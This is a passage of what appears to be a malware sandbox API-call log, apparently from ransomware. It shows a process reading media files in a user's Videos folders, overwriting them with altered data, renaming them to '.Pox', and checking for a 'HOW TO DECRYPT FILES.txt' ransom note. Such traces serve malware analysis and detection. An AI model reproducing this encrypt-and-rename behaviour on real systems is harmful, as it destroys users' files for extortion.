lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", lpFilePart=0x0) returned 0x5a [0041.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\o21 pjbhyf47gj.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.856] GetFileType (hFile=0x26c) returned 0x1 [0041.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.856] GetFileType (hFile=0x26c) returned 0x1 [0041.856] WriteFile (in: hFile=0x26c, lpBuffer=0x24f0d24*, nNumberOfBytesToWrite=0x2260, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x24f0d24*, lpNumberOfBytesWritten=0x3ae408*=0x2260, lpOverlapped=0x0) returned 1 [0041.857] CloseHandle (hObject=0x26c) returned 1 [0041.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi", lpFilePart=0x0) returned 0x5a [0041.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi.Pox", lpFilePart=0x0) returned 0x5e [0041.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\o21 pjbhyf47gj.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6737d20, ftCreationTime.dwHighDateTime=0x1d4c5c5, ftLastAccessTime.dwLowDateTime=0x10260180, ftLastAccessTime.dwHighDateTime=0x1d4d452, ftLastWriteTime.dwLowDateTime=0x2b20d900, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x2260)) returned 1 [0041.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\o21 pjbhyf47gj.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\o21 pJbhYF47gJ.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\o21 pjbhyf47gj.avi.pox")) returned 1 [0041.859] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", lpFilePart=0x0) returned 0x57 [0041.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\u9ce1a872kv.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.859] GetFileType (hFile=0x26c) returned 0x1 [0041.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.859] GetFileType (hFile=0x26c) returned 0x1 [0041.859] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0xe8ea [0041.859] ReadFile (in: hFile=0x26c, lpBuffer=0x24f3638, nNumberOfBytesToRead=0xe8ea, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x24f3638*, lpNumberOfBytesRead=0x3ae414*=0xe8ea, lpOverlapped=0x0) returned 1 [0041.860] CloseHandle (hObject=0x26c) returned 1 [0041.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.879] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", lpFilePart=0x0) returned 0x57 [0041.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\u9ce1a872kv.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.880] GetFileType (hFile=0x26c) returned 0x1 [0041.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.880] GetFileType (hFile=0x26c) returned 0x1 [0041.880] WriteFile (in: hFile=0x26c, lpBuffer=0x256bf08*, nNumberOfBytesToWrite=0xe8f0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x256bf08*, lpNumberOfBytesWritten=0x3ae408*=0xe8f0, lpOverlapped=0x0) returned 1 [0041.882] CloseHandle (hObject=0x26c) returned 1 [0041.883] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4", lpFilePart=0x0) returned 0x57 [0041.883] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4.Pox", lpFilePart=0x0) returned 0x5b [0041.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.883] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\u9ce1a872kv.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a548f0, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x7dc041b0, ftLastAccessTime.dwHighDateTime=0x1d4cef8, ftLastWriteTime.dwLowDateTime=0x2b259bc0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xe8f0)) returned 1 [0041.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.883] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\u9ce1a872kv.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\iYiVuH86FKUUy2zrS\\U9cE1a872Kv.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\iyivuh86fkuuy2zrs\\u9ce1a872kv.mp4.pox")) returned 1 [0041.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA", lpFilePart=0x0) returned 0x39 [0041.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\", lpFilePart=0x0) returned 0x3a [0041.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406008 [0041.884] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.884] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6ef7d0, ftCreationTime.dwHighDateTime=0x1d4ccd0, ftLastAccessTime.dwLowDateTime=0xb7cfa620, ftLastAccessTime.dwHighDateTime=0x1d4cd4a, ftLastWriteTime.dwLowDateTime=0xb7cfa620, ftLastWriteTime.dwHighDateTime=0x1d4cd4a, nFileSizeHigh=0x0, nFileSizeLow=0x78ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="915YANnKlksuH.avi", cAlternateFileName="915YAN~1.AVI")) returned 1 [0041.884] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb26a6ac0, ftCreationTime.dwHighDateTime=0x1d4cb39, ftLastAccessTime.dwLowDateTime=0x5aa505a0, ftLastAccessTime.dwHighDateTime=0x1d4c820, ftLastWriteTime.dwLowDateTime=0x5aa505a0, ftLastWriteTime.dwHighDateTime=0x1d4c820, nFileSizeHigh=0x0, nFileSizeLow=0x4c31, dwReserved0=0x0, dwReserved1=0x0, cFileName="wGjbcfyAcwE2k.mp4", cAlternateFileName="WGJBCF~1.MP4")) returned 1 [0041.884] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f9a0e50, ftCreationTime.dwHighDateTime=0x1d4c9c8, ftLastAccessTime.dwLowDateTime=0xc176b860, ftLastAccessTime.dwHighDateTime=0x1d4cff4, ftLastWriteTime.dwLowDateTime=0xc176b860, ftLastWriteTime.dwHighDateTime=0x1d4cff4, nFileSizeHigh=0x0, nFileSizeLow=0x627b, dwReserved0=0x0, dwReserved1=0x0, cFileName="YykOpWenky0hszJ.swf", cAlternateFileName="YYKOPW~1.SWF")) returned 1 [0041.884] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.885] FindClose (in: hFindFile=0x406008 | out: hFindFile=0x406008) returned 1 [0041.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA", lpFilePart=0x0) returned 0x39 [0041.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\", lpFilePart=0x0) returned 0x3a [0041.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406008 [0041.885] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.885] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6ef7d0, ftCreationTime.dwHighDateTime=0x1d4ccd0, ftLastAccessTime.dwLowDateTime=0xb7cfa620, ftLastAccessTime.dwHighDateTime=0x1d4cd4a, ftLastWriteTime.dwLowDateTime=0xb7cfa620, ftLastWriteTime.dwHighDateTime=0x1d4cd4a, nFileSizeHigh=0x0, nFileSizeLow=0x78ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="915YANnKlksuH.avi", cAlternateFileName="915YAN~1.AVI")) returned 1 [0041.885] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb26a6ac0, ftCreationTime.dwHighDateTime=0x1d4cb39, ftLastAccessTime.dwLowDateTime=0x5aa505a0, ftLastAccessTime.dwHighDateTime=0x1d4c820, ftLastWriteTime.dwLowDateTime=0x5aa505a0, ftLastWriteTime.dwHighDateTime=0x1d4c820, nFileSizeHigh=0x0, nFileSizeLow=0x4c31, dwReserved0=0x0, dwReserved1=0x0, cFileName="wGjbcfyAcwE2k.mp4", cAlternateFileName="WGJBCF~1.MP4")) returned 1 [0041.886] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f9a0e50, ftCreationTime.dwHighDateTime=0x1d4c9c8, ftLastAccessTime.dwLowDateTime=0xc176b860, ftLastAccessTime.dwHighDateTime=0x1d4cff4, ftLastWriteTime.dwLowDateTime=0xc176b860, ftLastWriteTime.dwHighDateTime=0x1d4cff4, nFileSizeHigh=0x0, nFileSizeLow=0x627b, dwReserved0=0x0, dwReserved1=0x0, cFileName="YykOpWenky0hszJ.swf", cAlternateFileName="YYKOPW~1.SWF")) returned 1 [0041.886] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f9a0e50, ftCreationTime.dwHighDateTime=0x1d4c9c8, ftLastAccessTime.dwLowDateTime=0xc176b860, ftLastAccessTime.dwHighDateTime=0x1d4cff4, ftLastWriteTime.dwLowDateTime=0xc176b860, ftLastWriteTime.dwHighDateTime=0x1d4cff4, nFileSizeHigh=0x0, nFileSizeLow=0x627b, dwReserved0=0x0, dwReserved1=0x0, cFileName="YykOpWenky0hszJ.swf", cAlternateFileName="YYKOPW~1.SWF")) returned 0 [0041.886] FindClose (in: hFindFile=0x406008 | out: hFindFile=0x406008) returned 1 [0041.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.886] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", lpFilePart=0x0) returned 0x4b [0041.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\915yannklksuh.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.886] GetFileType (hFile=0x26c) returned 0x1 [0041.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.886] GetFileType (hFile=0x26c) returned 0x1 [0041.886] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x78ea [0041.886] ReadFile (in: hFile=0x26c, lpBuffer=0x257cd8c, nNumberOfBytesToRead=0x78ea, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x257cd8c*, lpNumberOfBytesRead=0x3ae488*=0x78ea, lpOverlapped=0x0) returned 1 [0041.887] CloseHandle (hObject=0x26c) returned 1 [0041.951] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.951] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", lpFilePart=0x0) returned 0x4b [0041.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\915yannklksuh.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.953] GetFileType (hFile=0x26c) returned 0x1 [0041.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.953] GetFileType (hFile=0x26c) returned 0x1 [0041.953] WriteFile (in: hFile=0x26c, lpBuffer=0x23f06a8*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x23f06a8*, lpNumberOfBytesWritten=0x3ae47c*=0x78f0, lpOverlapped=0x0) returned 1 [0041.955] CloseHandle (hObject=0x26c) returned 1 [0041.956] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi", lpFilePart=0x0) returned 0x4b [0041.956] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi.Pox", lpFilePart=0x0) returned 0x4f [0041.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.956] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\915yannklksuh.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa6ef7d0, ftCreationTime.dwHighDateTime=0x1d4ccd0, ftLastAccessTime.dwLowDateTime=0xb7cfa620, ftLastAccessTime.dwHighDateTime=0x1d4cd4a, ftLastWriteTime.dwLowDateTime=0x2b3182a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x78f0)) returned 1 [0041.956] SetThreadErrorMode (dwNewMode=0x0, 